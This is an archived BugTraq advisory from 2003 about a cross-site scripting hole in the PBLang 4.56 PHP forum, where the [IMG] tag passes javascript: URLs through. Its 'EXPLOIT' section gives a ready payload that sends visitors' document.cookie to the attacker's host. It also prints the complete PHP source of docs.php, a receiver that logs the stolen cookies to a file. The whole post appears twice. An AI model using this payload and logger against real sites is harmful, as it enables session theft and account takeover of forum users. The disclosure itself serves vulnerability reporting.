BugTraq
Back to list
|
Post reply
PBLang Cross Site Scripting Vulnerability (Newest version)
Jul 27 2003 01:40AM
Quan Van Truong (quan_vu_208cn yahoo com)
PBLang is a PHP-base forum. A security hole has just found in this product
allows an attacker to steals cookies or does many things?
|--------------------------------------------|
Vulnerable systems: PBLang Forum
Version: 4.56 (4.5 RC 2)
Website: http://pblang.drmartinus.de/
Problem: Cross Site Scripting (XSS)
|--------------------------------------------|
When a you inserts [IMG]url[/IMG], PBLang?ll changes that text to < img
src=?url? >. If someone inserts javascript:?anyscript?() instead of the
url, the JavaScript code is executed by Internet Explorer or some other
web browsers.
EXPLOIT:
Inserting a new topic (or reply) with the following text will send
visitor's cookies to your host. The output is saved to http://your-
host/cookies.txt .
[IMG]javascript:window.open("http://localhost/docs.php?docs="+escape
(document.cookie), "subwindows", "height=100,width=486")[/IMG]
* Code of docs.php file:
*----------docs.php---------
<?php
define ("LINE", "\r\n");
define ("HTML_LINE", "<br>");
function getvars($arr, $title)
{
$res = "";
$len = count($arr);
if ($len>0)
{
if (strlen($title)>0)
{
print("[--------$title--------]" . HTML_LINE);
$res .= "[--------$title--------]" . LINE;
}
foreach ($arr as $key => $value)
{
print("[$key]" . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= "[$key]" . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date("Y-m-d H:i:s");
// init
$myData = "[-----$now-----]" . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, "");
// file
$file = $REMOTE_ADDR . "cookies.txt";
$mode = "r+";
if (!file_exists($file))
$mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
----------docs.php---------*
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
PBLang is a PHP-base forum. A security hole has just found in this product
allows an attacker to steals cookies or does many things?
|--------------------------------------------|
Vulnerable systems: PBLang Forum
Version: 4.56 (4.5 RC 2)
Website: http://pblang.drmartinus.de/
Problem: Cross Site Scripting (XSS)
|--------------------------------------------|
When a you inserts [IMG]url[/IMG], PBLang?ll changes that text to < img
src=?url? >. If someone inserts javascript:?anyscript?() instead of the
url, the JavaScript code is executed by Internet Explorer or some other
web browsers.
EXPLOIT:
Inserting a new topic (or reply) with the following text will send
visitor's cookies to your host. The output is saved to http://your-
host/cookies.txt .
[IMG]javascript:window.open("http://localhost/docs.php?docs="+escape
(document.cookie), "subwindows", "height=100,width=486")[/IMG]
* Code of docs.php file:
*----------docs.php---------
<?php
define ("LINE", "\r\n");
define ("HTML_LINE", "<br>");
function getvars($arr, $title)
{
$res = "";
$len = count($arr);
if ($len>0)
{
if (strlen($title)>0)
{
print("[--------$title--------]" . HTML_LINE);
$res .= "[--------$title--------]" . LINE;
}
foreach ($arr as $key => $value)
{
print("[$key]" . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= "[$key]" . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date("Y-m-d H:i:s");
// init
$myData = "[-----$now-----]" . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, "");
// file
$file = $REMOTE_ADDR . "cookies.txt";
$mode = "r+";
if (!file_exists($file))
$mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
----------docs.php---------*
[ reply ]